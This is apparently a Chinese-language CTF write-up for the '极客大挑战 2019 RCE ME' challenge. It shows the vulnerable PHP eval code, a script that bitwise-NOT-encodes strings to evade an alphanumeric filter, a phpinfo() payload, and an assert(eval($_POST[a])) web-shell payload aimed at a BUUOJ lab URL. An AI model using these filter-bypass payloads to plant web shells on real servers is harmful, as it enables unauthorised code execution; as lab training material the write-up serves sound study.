[极客大挑战 2019]RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

取反和异或均可绕过

<?php
$c='phpinfo()';
$d=urlencode(~$c);
$e=~($d);
if(preg_match("/[A-Za-z0-9]+/",$e)){
    echo 0;
}else {
    echo 1;
}

?>

这个取反号写在外面也没事，慢慢试就发现写里面才有效

?code=(~%8F%97%8F%96%91%99%90)();

然后我找了一下flag发现没有，然后又找了一下不能使用的函数


7.0的版本我们还需要
我们需要调用eval拼接为assert（eval($_POST[a])）

<?php 
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "\n";
$c='eval($_POST[a])';
$d=urlencode(~$c);
echo $d;

?>

?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);

然后链接

http://a967fa8b-203d-4c2a-b4ab-11c784927d01.node5.buuoj.cn:81/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);
密码是a

进入之后flag里面没有flag而readflag是一个程序

进入虚拟终端没有权限

使用插件

php7这两个都可以，我们刚才看了php版本的